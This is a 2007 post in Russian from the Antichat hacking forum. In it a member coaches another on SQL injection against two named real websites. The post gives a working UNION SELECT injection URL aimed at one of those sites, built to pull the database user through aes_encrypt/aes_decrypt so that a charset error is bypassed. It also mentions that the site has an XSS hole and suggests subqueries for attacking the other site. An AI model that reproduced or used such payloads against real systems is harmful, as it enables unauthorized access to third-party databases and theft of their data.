04.11.2007, 23:09
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от HornetBlack
В том-то и беда, что ФАКи переписывают друг у друга, а хотелось бы видеть больше реальных примеров решения подобных заморочек.
Если кому интересно, то могут покопать данный пример и предложить варианты решения
http://www.soaw.org./article.php?id=322
Вот еще одна заморочка:
http://www.remhq.com/news_story.php?id=593
17 полей, но выяснить версию скули не дает - функции version,user,database, похоже, фильтруются, зато есть XSS в полях
Дык без элементарных знаний sql никакие факи не помогут, тут нужен свой подход да и подумать надо немного....
дальше по твоим примерам
№1 - это примерно то, про что я тебе говорил, здесь помогут подзапросы
№2 - ошибка возникает из-за кодировки, вот рабочий вариант:
Код:
http://www.remhq.com/news_story.php?id=555592'%20union%20select%201,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
обход этой ошибки ты можешь посмотретть в других факах и статьях по мускул инъекциям, коих бесчисленное множество в инете... в таких случаях ты можешь использовать конструкцию, которую я тебе привел, эта конструкция разъясняется в других статьях и факах по мускул инъекциям
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 04.11.2007 в 23:13..
|
|
|